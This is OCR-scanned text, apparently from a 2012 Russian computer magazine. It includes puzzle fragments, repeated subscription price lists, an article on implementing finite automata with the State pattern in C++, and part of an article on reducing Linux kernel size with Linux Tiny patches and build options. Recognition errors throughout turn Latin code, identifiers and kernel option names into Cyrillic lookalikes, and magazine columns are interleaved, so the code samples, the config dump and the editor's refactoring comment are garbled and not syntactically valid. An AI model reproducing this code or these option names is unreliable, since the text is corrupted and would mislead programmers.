ности Фибоначчи. Код должен корректно работать в многопоточ- 
ной среде. 

4. В волшебной стране жили мужественные рыцари, свирепые драко- 
ны и прекрасные принцессы. Рыцари убивают драконов, драконы 
съедают принцесс, а принцессы изводят до смерти рыцарей. Всего 
было 100 рыцарей, 99принцесси 101 дракон. Древнеезаклинание, 
наложенное на всех, запрещаетубиватьтех, кто погубил нечетное 
число жертв. В настоящее время в этой стране остался всего один 
житель. Кто это и почему? 
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6 номеров — 1110 руб. 
13 номеров — 1999 руб. 



6 номеров — 1110 руб. 
13 номеров — 1999 руб. 



ідтеНапй 

ПОДПИШИСЬ! 

зііор.діс.ги 

Редакционная подписка без посредников — 
это гарантия получения важного для Вас 
журнала и экономия до 40% от розничной 
цены в киоске 

8-800-200-3-999 
+7 (495) 663-82-77 (бесплатно) 







6 номеров — 564 руб. 

1 3 номеров — 1105 руб. 



6 номеров — 1110 руб. 
13 номеров — 1999 руб. 



6 номеров — 810 руб. 
13 номеров — 1499 руб. 



6 номеров — 1110 руб. 
13 номеров — 1999 руб. 




6 номеров — 630 руб. 

1 3 номеров — 1140 руб. 



6 номеров — 895 руб. 
13 номеров — 1699 руб. 



6 номеров — 1194 руб. 
13 номеров — 2149 руб. 



6 номеров — 894 руб. 

1 3 номеров — 1 699 руб. 










6 номеров — 690 руб. 
13 номеров — 1249 руб. 



6 номеров — 775 руб. 
13 номеров — 1399 руб. 



6 номеров — 950 руб. 

1 3 номеров — 1 699 руб. 



6 номеров — 810 руб. 

1 3 номеров — 1 499 руб. 
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сіееопіз (сіееопізйдтаіі.сот) 



ПАТТЕРН 





КОНЕЧНЫЕ 
АВТОМАТЫ В ООП 



Программирование и математика всегда были 
дружны между собой. Да что там лукавить — 
программирование изобрели математики, 
чтобы решать свои уравнения, преобразо- 
вывать матрицы и просчитывать число Пи 
с сумасшедшей точностью. Поэтому многие 
студенты-программисты, сталкиваясь в вузах 
со сложной математикой, не совсем понимают, 
как это пригодится им при создании своего 
фейсбука, гугла и прочих вкусностей. А между 
тем математика и ее подразделы пустили свои 
корни даже в самых простых тулзах. 



туденты всяческих физматов, матмехов и прочих подоб- 
ных сочетаний — если они хоть немного слушали своего 
преподавателя по дискретной математике — должны 
знать о такой штуке, как конечные автоматы. Для тех, кто «забыл», 
и прочих гуманитариев напомню, что конечный автомат — это ма- 
тематическая абстракция, которая имеет заданное число конечных 
состояний и входной алфавит, который может переводить автомат 
из одного состояния в другое. Переход определяется функцией, ко- 
торая принимает в качестве параметра один из символов входного 
алфавита. 

Конечные автоматы активно используются на практике, на- 
пример в синтаксических и лексических анализаторах. Но теорию 
автоматов можно применить даже к самой простой программе. 

Пусть у нас есть утилита, которая умеет подключаться к уда- 
ленному серверу, что-то делать, а затем отключаться. У нее 
красивый графический интерфейс с кнопками «Соппесі» и 
«Оізсоппесі», с помощью которых пользователь и управляет 
соединением. Теперь если немного напрячь мозги, то можно 
понять, что наша тулза представляет собой конечный автомат. 
Она имеет два состояния: «Подключен» и «Не подключен», а 
также входной алфавит, символы которого могут изменять это 
состояние. Входным алфавитом является не что иное, как кноп- 
ки подключения к серверу и отключения от сервера. Получился 
такой вот простой и небольшой автомат. 
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Паттерн «Состояние» 



ТРАДИЦИОННАЯ РЕАЛИЗАЦИЯ 
КОНЕЧНОГО АВТОМАТА 

Теперь давай попробуем набросать код, который будет управлять 
соединением. Для начала реализуем класс БегѵегСоппесІіоп, 
который будет давать нам возможность подключаться к серверу 
и отключаться от него, а также предоставлять своему клиенту 
информацию о текущем статусе соединения. 

Класс управления соединением БегѵегСоппесЬіоп 

сІаББ БегѵегСоппесІііоп 

Ь_ 

ргіѵаіе: 

сопбі: іпі: 5_ соппес1=есІ ; 
сопбі: іпТ 5 СІІ5С оппесіесі; 



іпі: тБіаіиБ; 
риЬІіс : 

БегѵегСоппесііопО : 5_соппес1:есІ(Ѳ) л 5_сІІ5соппес1:есІ(1) 

{ 

т^БіаіиБ = 5_сІІ5соппес1:есІ; 

} 



ѵоісі соппесЕ() 

і-р (т БІіаІіиБ == БСІІБСоппесіесО 

{ 

// ... 

// Код для подключения к серверу 

// ... 



// Меняем статус соединения 

т^БіаІіиБ = 5_соппес1:есІ ; 

} еІБе ІТ (т БіаІіиБ == 5 соппесіесП 

{ 

// Сообщаем клиенту, что уже подключены 

} 

} 



ѵоісі с ІІБсоппесіП 

{ 

і-р (ш БіаІшБ == 5 соппесіесП 

{ 

// ... 

// Код для отключения от сервера 

// ... 



// Меняем статус соед и нения 

ШБІіаіиБ = БсІІБсоппесіесІ : 

> еІБе і-р ( ш БіаІіиБ == 5_сІІ5соппес1:есІ) 

{ 

// Сообщаем клиенту, что уже отключены 

} 

} 

ь_ 

Для начала мы определили константы состояния: 5_соппесІесІ 
и 5_сІІ5СоппесІесІ. Также у нас есть переменная, хранящая 
текущее состояние, — т_5ІаІи5. При инициализации объекта 
БегѵегСоппесІіоп переменная т_5ІаІи5 имеет значение 5_ 
сі ізсоп песіесі, то есть при запуске программы мы не подключены 
к серверу. Также у нас есть два метода: соппесД] и сПзсоппесД). 
Реализация методов очень проста: сначала мы проверяем теку- 
щее состояние соединения, и если оно приемлемо для выполне- 
ния данного метода, то последний делает свою работу. Например, 
функция соппесД] подключается к серверу только тогда, когда 
т_5ІаІи5 == 5_сІІ5соппесІесІ. В противном случае срабатыва- 
ет исключение или возвращается код ошибки. Помимо этого 




Диаграмма классов паттерна «Состояние» 



метод соппесД) изменяет состояние объекта с з сіізсоппесіесі на 
5_соппесІесІ. 

Теперь реализуем 6Ш, который управляет объектом класса 
БегѵегСоппесІіоп. В классе диалога будут всего два метода, кото- 
рые срабатывают при нажатии кнопок «Соппесі» и «Оізсоппесі». 

В случае если одна из кнопок нажата в тот момент, когда соедине- 
ние с сервером находится не в том состоянии, мы будем перехваты- 
вать исключение, генерируемое методом класса ЗегѵегСоппесІіоп, 
и выводить соответствующее сообщение. 

Класс диалога для управления соединением 

сіэбб Оіа1о§ 

{ 

БегѵегСоппесІііоп &ш_5егѵСопп; 

// ... 

риЬІіс : 

5егѵегСоппес1:іоп( ) 

{ 

т_5егѵСопп = пеш БегѵегСоппесііопО ; 

} 



// ... 

ѵоісі Ы=пСоппес1=Р 

т БегѵСопп . соппесі ( ) ; 

// ... 

3 _ 



ѵоісі Ыіп РІБСоппе сІіП 

{ 

т_ 5егѵСопп .сІІ5С Оппес1:П ; 

// ... 

} 

} 

Все просто и со вкусом. Код работает как часы и понятен даже 
начинающему программисту. Оно и ясно: этот подход применяет- 
ся уже много лет. Использование конструкции бѵѵіісЬ в методах 
БегѵегСоппесІіоп обеспечивает нам нужную функциональность. 
Такой подход называется процедурным. Он хорош, но у него есть 
пара недостатков. 

00П-П0ДХ0Д И ПАТТЕРН «СОСТОЯНИЕ» 

Наша программа работает исправно, но пришло время ее дорабо- 
тать. Когда пользователь жмет кнопку «Коннект», тулза моменталь- 
но переходит в состояние «Подключено». Но на самом деле процесс 
подключения к удаленному серверу может занимать некоторое 
время. Пользователь должен видеть, что программа после нажатия 
соответствующей кнопки только устанавливает соединение. Также 
мы решили сделать новую фичу — отправку данных на сервер. Для 
этого мы пририсовали красивую кнопочку « Б е п сі Оаіа» и отправи- 
лись смотреть, что же можно сделать в классе БегѵегСоппесІіоп. 
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У нас добавилось два новых состояния: з_соппесІіпд и 
з_зепсііпд0а1а. Причем теперь пользователь не может напрямую 
перевести программу в состояние з_соппесІесІ, кнопка «Коннект» 
должна переводить программу в з_соппесІіпд, а уж только потом, 
в зависимости отуспеха процесса подключения, тулза устанав- 
ливает переменной т_5ІаІиз значение либо з_соппесІесІ, либо 
5_сІІ5С0ппесІесІ. Таким образом у нас намечается изменение кода 
в методах соппесД) и сПзсоппесД). Тело оператора зѵѵіісЬ разрас- 
тется в два раза, плюс у нас добавится еще один метод зепсЮаІаП, 
который также будет иметь свое ветвление. 

Менять уже готовый код класса для расширения функ- 
ционала не очень хорошая идея. Основной принцип объектно- 
ориентированного проектирования гласит, что правильный класс 
должен быть закрыт для изменения, но открыт для расширения. 

Это значит, что для того, чтобы добавить новые состояния в 
БегѵегСоппесІіоп, нам нельзя лезть в код уже реализованных мето- 
дов, так как это чревато разного рода ошибками. 

Чтобы провернуть такой хитрый трюк, следует сделать состоя- 
ния полноценными объектами, которые будут брать на себя часть 
функций БегѵегСоппесІіоп. 

Для этого мы определим интерфейс Біаіе, от которого будут 
наследоваться уже конкретные классы состояний. Интерфейс 
будет описывать три метода: соппесД), сПзсоппесД) и зепсЮаІа(). 
Наследники Біаіе будут по своему усмотрению переопределять эти 
методы, чтобы добиться правильной функциональности. 

Классы состояний 

сіазз 51=а1=е 

риЫіс : 

ѵоісі соппес1:()__= 0 ; 
ѵоісі сІізсоппесіО = 0 ; 
ѵоісі зепсІРаІіаО = 0 ; 

}— 



сіазз СоппесіесІ : риЫіс 51:а1:е 

Ь_ 

Бег ѵегСоппесІііоп *т_зегѵС опп ; 

риЫ іс : 

СоппесіесІ (БегѵегСоппесІііоп *зс') 

{ 

тзегѵСопп = зс: 

} 



соппесЦ) 

{ 

// Сообщение о невозможности операции 

} 



ѵоісі с ІізсоппесІіП 

{ 

// Код отключения от сервера 

т_зегѵСопп->зе1:51:а1:и5( 

тзегѵСопп-^еІіРізсоппесІіесІБІіаІіизО ^ ; 

■Ь_ 



// Остальные методы, в том числе и зепсІРаІіаО; 

Ь- 



сіазз РізсоппесіесІ : риЫіс Біаіе 

і_ 

БегѵегСоппесІііоп *т_зегѵСопп; 

риЫіс : 

Різсоппесііесі (БегѵегСоппесІііоп *зс) 

{ 

т_зегѵСопп = зс; 
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Пример кода паттерна «Состояние» 



соппесіО 

і_ 

// Ставим статус, что мы в процессе подключения 
т_зегѵСопп->зе1і51іа1іи5( 

т_зегѵСопп->%е1іСоппес1ііп§51іа1іи5 0 ) ; 

// Подключаемся к серверу 



// По завершении ставим статус об успешном 

// подключении 

т_зегѵСопп->зе1і51іа1іи5( 

т_зегѵСопп->%е1іСоппес1іесІ51іа1іи5(Н ; 

-Ь- 



ѵоісі сІізсоппес ІіП 

// Сообщение о невозможности операции 



// Остальные методы, в том числе и зепсІРаІіаО; 

} 

Некоторые методы для определенных состояний бессмыс- 
ленны, и мы сообщаем об этом клиенту. Но тут нас больше 
интересует работа с объектом класса БегѵегСоппесІіоп. При 
создании состояний мы передаем указатель на переменную 
БегѵегСоппесІіоп, который затем используется для вы- 
зова методов зеіБіаІе и методов состояний ЗЕТ. Например, 
класс Соппесіеб описывает состояние программы, когда она 
подключена к серверу. Следовательно, при вызове метода 
сі ізсоп песі() мы должны инициировать процедуру отключе- 
ния, а затем сменить состояние т_зегѵСопп на Оізсоппесіесі. 
Для этого мы получаем объект состояния с помощью функ- 
ции деЮізсоппесІесІБіаІеП, после чего передаем его методу 
зеіБіаІеО. Причем оба метода — и деЮізсоппесІесІБіаІеП, и 
зеіБіаІеП — принадлежат классу БегѵегСоппесІіоп. Такие 
хитрые манипуляции нужны, чтобы ослабить связи между объ- 
ектами, что очень полезно для архитектуры приложения. 
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Чтобы получше разобраться в том, что теперь делает 
ЗегѵегСоппесЬоп, нужно взглянуть на его код. 

Новый код БегѵегСоппесЬіоп 

с Іа б 5 БегѵегСоппесІііоп 

ргіѵаіе: 

Бііаііе *5_соппес1іесІ; 

Бііаіе *5_сІІ5соппес1=есІ ; 



Бііаііе *т_5Ііа1іи5; 

риЬІіс : 

5егѵегСоппес1ііоп( ) 

{ 

5 соппесЕес! = пеы СоппесЬесК^Ыз) ; 
Бсіізсоппесііесі = пеы РізсоппесІіесКііЬІБ ); 



т_5Ііа1іи5^ 5_сІІ5соппес1іесІ; 

} 



ѵоісі зе1=51=а1=и5(51=а1=е *5І=а1=и5) 

{ 

шзііаііиз = БІіаІіиБ; 



Бііаііе* §еіСоппес1іесІ51іа1іи5() 

{ 

геііигп 5 _соппес1=есІ ; 

} 



// Реализация остальных методов ^еІіХххБІіаІіиБО 



ѵоісі с оппесІіП 

ш_5І:а1:и5->соппес1:0 ; 

} 



ѵоісі сІІ5соппес1=0 

{ 

т_5іаіи5->4І5соппес1:() ; 

_ 3 ^ 

ь_ 

Про методы состояний СЕТ и зеіБіаІеП мы уже знаем, так что 
эта часть в пояснениях не нуждается. А вот на реализацию методов 
соппесШ и сПзсоппесШ следует взглянуть внимательнее. Посколь- 
ку мы перенесли все необходимые действия по подключению/ 
отключению в классы состояний, то БегѵегСоппесІіоп просто 
вызывает соответствующий метод у объекта, который хранится 
в переменной т_5ІаІи5. Теперь она у нас, кстати, совсем не іпі, 
указатель на Біаіе. 

Но вернемся к тому, ради чего все это затевалось. Нам нужно 
добавить состояния подключения к серверу и отправки данных. 
Для этого в интерфейсе Біаіе у нас уже есть все нужные описания, 
осталось реализовать только соответствующих наследников. 

Состояния СоппесІіп^ и 5епсІіп§Ра1:а 

сІазБ Соппесііпе : риЬІіс Бііаііе 

і_ 

БегѵегСоппесІііоп *т_5егѵСопп; 
риЬІіс : 

Різсоппесііесі (БегѵегСоппесІііоп *бс) 

{ 

т_5 егѵСопп = бс; 

} 



// В этом состоянии мы ничего не можем сделать. 




Пример диаграммы конечного автомата 

// просто ждем, пока мы подключимся к серверу 
ѵоісі соппесіО 
{ 

// Сообщение о невозможности операции 

} 



ѵоісі сІІ 5соппес1:П 

// Сообщение о невозможности операции 

-Ь- 



ѵоісі Б епсІРаІіаП 

// Сообщение о невозможности операции 

-Ь- 



сІаББ 5епсІіп§Ра1іа : риЬІіс Бііаііе 

{ 

БегѵегСоппесІііоп *ш зегѵСопп; 
риЬІіс: 

Різсоппесііесі (БегѵегСоппесІііоп *бс) 
ш БегѵСопп = бс; 

} 



ѵоісі БепсІРаІіаП 

{ 

// Ставим статус, что мы в процессе отправки данных 

т_ 5егѵСопп->Бе1і51іа1іи5(' 

_т__5егѵСопп - >§е1і5епсІіп§Ра1іа51іа1іи5 ( ) ) ; 

// Отправляем 



//В конце ставим статус, что мы вновь 

// готовы к отправке 

т_БегѵСопп->Бе1і51іа1іи5( 

т_5егѵСопп->§е1іСоппес1іесІ51іа1іи5() ) ; 

} 



// Остальные методы 



ХАКЕР 06/161/2012 



101 






кодинг 



Теперь мы не можем напрямую перевести программу в состоя- 
ние «Подключено». Метод соппесШ в начале процесса соединения 
присваивает переменной т_5ІаІи5 указатель на СоппесЬпд, а уж 
только после удачного завершения процедуры переводит его в 
Соппесіесі. Функция зепсЮаЫ), так же как и соппесШ, по за- 
вершении процесса отправки данных переводит объект класса 
ЗегѵегСоппесЬоп в состояние «Подключено», предварительно 
выставив статус «Отправка данных». 

Осталось немного доработать класс ЗегѵегСоппесЬоп. Для 
этого в конструкторе нам следует создать два объекта состояния: 
Соппесіеб и ЗепсІіпдОаІа, а также написать соответствующие 6ЕТ- 
методы и функцию зепсЮаЫ). 

Доработка класса БегѵегСоппесЬіоп 

сІазБ Б егѵегСоппесііоп 

ргіѵаіе: 

Біаііе *5_соппес1:есІ; 

$1=а1=е *5_сІІ5соппес1= есІ; 

$1=а1=е *5_соппес1:іп§; 

Біаіе *5_зепсІіп§0а1:а; 



Біаіе *т_5і:аі:и5; 

риЬІіс : 

5егѵегСоппес1:іоп( ) 

{ 

5 соппесЕес! = пеы СоппесЬесКііІ'іІБ) ; 

6 сіізсоппесігесі = пеы РізсоппесІіесКііЬІБ ); 
5_соппес1:іп§ = пеы Соппес1:іп§(1:ЬІ5 ); 
5_зепсІіп§0а1:а = пеы БепсІіп^Ра1:а (1:ЬІ5) ; 



т_5І=а1=и5 = 5_сІІ5соппес1:есІ; 

:ь_ 



Біаіе* §еіСоппес1:іп§51:а1:и5( ) 
геііигп б соппѳсіііп^; 

-Ь- 



Біаіе* ^еіБепсІіп^РаіаБіаіиБО 
геіигп 5 БепсІіп^Раіа; 



// Реализация 5е1:51:а1:и5Г) и остальных 
// методов ^еіХххБІіаІіиБО 



ѵоісі зепсІРаІіаО 

{ 

т_5І:а1:и5->5епсЮа1:а() ; 

} 

} 

Теперь ЗегѵегСоппесІіоп вообще не задумывается о том, в каком 
состоянии находится соединение. За него это делают классы, 
реализующие Зіаіе-интерфейс. Последние, кстати, тоже не особо 
вникают в общую картину, они лишь выполняют свою маленькую 
обязанность, которая проста и понятна. 

ЗАКЛЮЧЕНИЕ 

Мы смогли реализовать объектно-ориентированный конечный 
автомат с помощью паттерна «Состояние». Хотя в результате код 
класса БегѵегСоппесІіоп не закрыт от изменений полностью — нам 
все еще приходится модифицировать конструктор и добавлять 
некоторые методы, но это уже значительно лучше, чем разрас- 
тающийся бѵѵіісЬ или цепочка ІЕ Знание этого паттерна и умение 
применить его на практике сэкономит не один час отладки любому 
00 -кодеру. □С 



КОММЕНТАРИЙ РЕДАКТОРА 


НИКОЛАЙ «СОШ» АНДРЕЕВ: 


БЕаЕе *т Біаіиз; 


Паттерны проектирования тем хороши, что каждый их реализует, как 


риЬІіс : 


ему удобнее и приятнее. Я предлагаю немного отрефакторить код, 


5егѵепСоппес1:іоп() { 


приведенный сіееопіз'ом. Мне немного режет глаз, что приходится 
определять методы, возвращающие объекты состояния, и что для 


БеіБіаіиБ^ІБсоппесіесІ : :Іпз1:апсе() ) ; 


// Прикрутили "Одиночку" . поэтому вызов 


каждого объекта БегѵегСоппесІіоп приходится создавать по одному 
объекту на состояние в системе. А если состояний, например, 


// статического метода для получения инстанса 

} 


сто, а соединений десять тысяч? В общем, имхо, можно проще и 


ѵоісі зеі:5і:аі:и5(5і:аі:е *5іа1:и5) 


эффективнее. 


{ 


Во-первых, в классе «Состояние» не нужен указатель на объект- 


щ Біаіиз = Біаіиз; 


родитель. Его можно передавать при вызове метода. 


} 


ѵоісі соппесіО 


сіазз $1:а1=е { 


1 


риЬІіс : 


т 5І:а1:и5->соппес1:(1:ЬІ5’) ; 


ѵоісі соппесі(5егѵегСоппес1:іоп* сопп) = 0; 


} 


ѵоісі сІІБСоппесіГБегѵегСоппесііоп* сопп') = 0: 


ѵоісі зепсЮаіаО 


ѵоісі БепсЮаіаГБегѵегСоппесііоп* сопп) = 0: 




} 


т 5і:а1:и5->5епсЮа1:а(1:ЬІ5) ; 


} // и так далее . . . 


Во-вторых, состояние можно сделать синглтоном, чтобы не рожать 


ь_ 


кучу объектов (о паттерне «Одиночка» читай в предыдущих номерах). 
Класс соединения станет попроще: 


По-моему, получается красивей. Правда, хочу обратить твое 
внимание, если наше состояние будет синглтоном, то внутрях его 


сІаББ БегѵегСоппесІііоп { 


мы никаких данных хранить не сможем. Впрочем, не очень-то и 


ргіѵаіе: 


хотелось ;). 
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МУЖСКАЯ ТЕРРИТОРИЯ 
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ИЩИТЕ КАНАЛ Б КАБЕЛЬНЫХ СЕТЯХ СТРАНЫ 



ІЖІХОГО 



Евгений Зобнин (ехесЫГш] 




Липосакция 

для пингвина 



СОКРАЩАЕМ РАЗМЕР 
И ВРЕМЯ КОМПИЛЯЦИИ 
ЯДРА ЫІШХ 




Говорят, что для работы ядру Ыпих 
требуется как минимум 1 Мб оперативки 
и любой 32-разрядный процессор. Однако 
если посмотреть на ядра в современных 
дистрибутивах, то можно заметить, что их 
размеры колеблются от 1,5 до 3 Мб, а это 
значит, что в заветный 1 Мб не уместится 
не только какое-либо ПО, но даже само ядро 
без модулей. Для низкопроизводительных 
компов и встраиваемой техники это 
может быть проблемой, так что попробуем 
разобраться, как можно избавить Тукса 
от лишнего жира. 



ВВЕДЕНИЕ 



Обычно, когда люди начинают задумываться об уменьшении разме- 
ров ядра Ыпих, они приходят только к одному возможному способу: 
выбрасыванию из ядра всего, что может быть лишним, включая 
драйверы, ненужные подсистемы и так далее. Это на самом деле по- 
зволяет существенно снизить общий размер ядра, однако есть еще 
два эффективных способа: использовать патчи, созданные в рамках 
проекта Ыпих Тіпу, и задействовать специальные флаги компилято- 
ра. Все три подхода мы и рассмотрим в этой статье. 



имііхтіыѵ 



Ыпих Тіпу — это набор патчей для Ыпих, который убирает из ядра 
всю лишнюю функциональность и изменяет логику его работы 
таким образом, чтобы сделать расход памяти настолько малым, на- 
сколько это вообще возможно. Функциональность, реализованная 
в рамках проекта, включает в себя: 

• Возможность тонкой настройки функции ргіпік, используемой 
ядром для вывода диагностических сообщений. Опция позво- 
ляет не только отключить их вывод, но и удалить из ядра все 
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Липосакция для пингвина 




Результат работы скрипта Ыоаі-о-теіег 



ненужные сообщения, сделав его размер меньше. Например, 
удаление всех сообщений об ошибках делает ядро на 300 Кб 
меньше. 

• Использование Іоокир-таблиц для вычисления СРС при про- 
верке целостности ЕіИегпеІ-пакетов. Позволяет сэкономить 
около двух символических килобайт памяти во время работы 
в ЕіЬегпеІ-сетях. 

• Уменьшение количества поддерживаемых протоколов с по- 
мощью удаления редких протоколов вроде АррІеТа Ік, а также 
изменение размеров буферов и открытых сокетов. 

• Сокращение количества іпііпе-фун кций, которые включаются 
компилятором в код вместо обычного вызова. Такие функции по- 
зволяют сделать работу ядра быстрее, однако из-за дублирования 
кода в разных участках ядра его общий размер возрастает. 

• Использование менее быстрого, но более экономного 51.0В- 
аллокатора памяти вместо 5І_АВ. 

• Использование опции компилятора '-Оз' при сборке ядра, кото- 
рая заставляет ОСС производить оптимизации, направленные 
на уменьшение размера полученного файла. 

Некоторые наработки, созданные в рамках проекта, уже 
включены в официальную ветку ядра, однако другие, в силу осо- 
бенностей их реализации, доступны только в специальной версии 
ядра, подготовленной участниками проекта: зіІогіоиз.огдЛіпѵІаЬ/ 
ііпѵііпих . Стоит сказать, что из-за недостатка времени и ресурсов 
ядро развивается с отставанием. На момент написания статьи про- 
ект І_іпих Тіпу предлагал только ядро 2.6.35 — впрочем, это не так 
плохо, учитывая, что коренных изменений, ломающих совмести- 
мость, в І_іпих не было уже давно. 

Для получения копии репозитория нужно выполнить следую- 
щую команду (размер репозитория около 360 Кб): 

$ §І1: сіопе §И:://§і1:огіои5.ог§/1:іпу1аЬ/1:іпу1іпих.§і1: 

Далее можно перейти в каталог с исходниками, запустить кон- 
фигуратор ядра и выбрать нужные оптимизации: 

$ ссі Іііпѵііпих 

$ таке §сопб§ Ц_ таке теписопб§ 



ТЮНИНГ ПАРАМЕТРОВ СБОРКИ 



Теперь можно выбрать нужные нам возможности ядра и отключить 
те, в которых нет необходимости. Сделать это не так просто, как 
кажется на первый взгляд. Многие опции по описанию выглядят со- 



СТОИТ СКАЗАТЬ, ЧТО ИЗ- 
ЗА НЕДОСТАТКА ВРЕМЕНИ 
И РЕСУРСОВ ЯДРО 
РАЗВИВАЕТСЯ С ОТСТАВАНИЕМ 
ПОДДЕРЖИВАТЬ ВСЕ 
В РАБОЧЕМ СОСТОЯНИИ 



вершенно безобидными и не несут ничего важного, но на самом деле 
могут сломать либо все ядро, либо половину приложений, которые ты 
собираешься запускать под его управлением. Все опции сборки мы, 
конечно, обсудить не сможем, но самые важные рассмотрим. 

Итак, после открытия окна сборки первое, что увидим, — это 
секция «ОепегаІ 5е1ир». Здесь содержится множество опций, 
которые можно (почти) безболезненно отключить. Большинству 
приложений совершенно не нужны Бузіет V ІРС и Р05ІХ Меззаде 
Оиеііез — отключаем. В5й Ргосезз Ассоипііпд, Ехрогі Іазк/ргосезз 
зіаіізіісз іЬгоидЬ пеіііпк нужны для отладки — отключаем. АисШіпд 
зиррогі — аудит системных событий, механизм, необходимый для 
отладки и работы некоторых систем безопасности, Сопігоі Огоир 
зиррогі — поддержка сдгоирз, по идее, очень нужная вещь, но 
совсем не обязательная. Далее, епаЫе бергесаіесі зуз^з ^еаіигез 
Іо зиррогі оИ изегзрасе Іооіз — поддержка устаревших возмож- 
ностей зуз^з, кому они нужны? КегпеІ-> изег зрасе геіау зиррогі 
(Іюгтегіу геІауЫ — псевдоФС геіау^з, используемая некоторыми 
виртуальными файловыми системами типа сІеЬид^з, — не тре- 
буется. Ыатезрасез зиррогі — пространства имен, позволяют 
реализовать разного рода песочницы, используются в І_ХС — не 
нужно, если не знаком с этим. Іпіііаі РАМ Яіезузіет апсі РАМ сіізк 
(іпіігат^з/іпіігсі) зиррогі — поддержка іпіігат^з, то есть начальной 
мини-ФС, используется почти всеми дистрибутивами, однако не 
получила распространения в среде встраиваемых устройств. Со- 
ответственно, необходимость в ней зависит от целей сборки ядра. 
Опция ЕпаЫе РСІ диігк ѵѵогкагоипсіз позволяет отключить код для 



3 НіЛогаэЛсаІ Зц двпегаіей таке сопіід; гіап'1 «111 
= Ііпим Ьсгпсі ѵвгяійп: 2. 5.35= 13 

4 Ггі Йрг е ІЙ: 13:00 2Й12 

в 

ганис_Б^віт=и 
я тнгів_да_32 іа ло* «і 

СОНГ Ш.ХВБ _&«*=*) 

сомпе.іНБГкистшн оепйен-у 
сонгіс оитрит пюн№ ві «і 

ИНРІО. ЙЙСН_КРСОІГТБ- И АгсЫк0Б^саі1Ідз/каБ БА йеТсопГід" 

ООНПВ босс 1С ІІГЕ=У 

С0НГ ІС,БШЕЕ I С„СНК _иРМТЕ=у 

СПНРЩ СЮСКБДОВСЕ НЙТСНООБ-у 

СОМЕ Ш_СЕ НЕЙ 1 С_СБ ДСКЕѴЕНТ^у 

СОМГШ.СЕЛЕРІС СИККЕѴЕИТ5 

СШГІ6 ІЛИВЕР 5иРНИТ=у 

сонг іе_5тясктйпсЕ_5иррс^т=у 

соме ш няѵе иятЕМСѴтар оирроет= у 

сомЕіе_ннц-м 

спнрш_аонЕ-_огпі=и 

СОНГ іе_НЕ ЕО_РПЯ_ІІВР _ЗШЕ = ІА 

СОНЕ Ш.НЕЕЦ.5В.йПП.ЕЕНЁ1Н=ц 
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Чистим ядро 



сбойных РСІ-чипсетов. РгоЯІіпд зиррогі — поддержка профайлин- 
га, не нужна. 

Далее следуют опции, добавленные проектом І_іпих Тіпу. Опция 
Оріітіге І'ог зіге используется для указания компилятору флага 
'-Оз' при сборке, поэтому нужна. В разделе «СопПдиге зіапбагб 
кегпеі І'еаіигез (І'ог зтаІІ зузіетз)» можно отключить многие другие 
функции. 

• ЕпаЫе 16-ЬіІ ІЛй зузіет саііз — поддержка устаревших 16-бит- 
ных идентификаторов пользователей, фактически не нужна. 

• БузсІІ зузсаІІ зиррогі позволяет отключить поддержку зузсіі, 
которая не используется во встраиваемой технике. 

• І_оасІ аІІ зутЬоІз ^ог сІеЬиддіпд/кзутоорз контролирует под- 
держку отладочной информации, печатаемой на экран в случае 
ошибок, ее отключение позволяет сэкономить 300 Кб. 

• Биррогі {ог ЬоІ-рІиддаЫе сіеѵісез — поддержка горячего под- 
ключения устройств, опять же обычно не нужна во встраивае- 
мой технике. 

• ЕпаЫе зиррогі {ог ргіпік — поддержка функции ргіпік, с по- 
мощью которой происходит вывод на экран сообщений ядра. 

• ЕпаЫе кегпеі рагатеіег, ЕпаЫе ЬиіІЫп тосіиіе рагатеіегз — 

поддержка параметров загрузки ядра и модулей. 

• ВШИ) зиррогі — отключение макросов ВІІ6 и ѴѴАРЫ, которые 
также используются для вывода сообщений об ошибках. 

• ЕпаЫе ЕІ_Р соге сіитрз — отключение отладочных дампов 
(*.сІитр). 

• ЕпаЫе РС-5реакег зиррогі — поддержка встроенного динамика 
ПК. 

• ЕпаЫе ІиІІ-зііесІ сіаіа зігисіигез Іог соге — оптимизация 
внутренних структур данных по размеру, приводит к меньшему 
потреблению памяти, но более медленной работе. 

• ЕпаЫе Іиіех зиррогі — поддержка мьютексов (блокировок) про- 
странства пользователя, ломает совместимость с дІіЬс. 

• ЕпаЫе еѵепіроіі зиррогі — поддержка системных вызовов 
семейства ероІІ, фактически не влияет на совместимость 

с приложениями, однако некоторые высокопроизводительные 



приложения, например пдіпх, без них будут работать намного 
медленнее. 

• Три опции ЕпаЫе зідпаІІсіО / ІітегІсіО / еѵепіісіі) зузіет саІІ по- 
зволяют отключить соответствующие системные вызовы. 

• ІІзе ІиІІ зіітет Іііезузіет — поддержка зЬтет, используемой, 
в частности, файловой системой Ітріз. Отключение этой опции 
приведет к замене кода зИтет на более простой и неэффектив- 
ный гатіз. 

• ЕпаЫе АІО зиррогі — поддержка асинхронного ввода-вывода, 
который используется многими высокопроизводительными 
приложениями. 

Следующая после секции «ОепегаІ Беіир» опция ЕпаЫе ІоабаЫе 
тосіиіе зиррогі отвечает за поддержку подгружаемых модулей 
ядра. Поначалу может показаться, что вынести всю лишнюю функ- 
циональность — хорошая идея, так как это позволит сократить 
размер ядра, однако на самом деле модули так или иначе будут за- 
нимать место в памяти, а код, нужный для их поддержки, сделает 
ядро больше. Гораздо эффективнее отключить поддержку модулей 
вовсе и включить все нужные драйверы в ядро, заодно можно 
будет избавиться от утилит ІзтосІ, тобргоЬе и іпзтосі. 

Далее идет секция «ЕпаЫе 1Ье Ыоск Іауег», в которой можно 
выбрать поддерживаемые планировщики ввода-вывода (опция 
10 БсЬебиІегз). Лучше оставить только один из них, причем какой 
именно — зависит от задач ядра. В стандартной системе опти- 
мальным выбором будет СРО, тогда как для встраиваемых систем 
больше подойдет Оеабііпе. 

Опции процессора (Ргосеззог Іуре апб Іеаіигез). Большого 
смысла отключать их нет, так как их код занимает совсем немно- 
го, а вот последствия отключения могут быть очень печальными, 
вплоть до отказа в загрузке ядра (хотя в большинстве случаев 
просто упадет общая производительность системы). Что можно без 
последствий отключить в этой секции? 

• Поддержку ІОММІІ (опции ІВМ Саідагу ІОММІІ зиррогі и АМй 
ІОММІІ зиррогі), которая нужна для защиты памяти; 
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• поддержку многопоточности в Репііит 4 и выше (опция 5МТ 
(НурегіЬгеасІіпд) зсбесіиіег зиррогі); 

• оптимизации планировщика для многоядерных процессоров 
(МиШ-соге зсЬесІиІег зиррогі); 

• поддержку онлайн-обновления микрокода 
(/беѵ/сри/тісгососіе — тісгососіе зиррогі); 

• поддержку N11 МА (ІМита Метогу АІІосаІіоп апсі БсЬесІиІег 
Биррогі); 

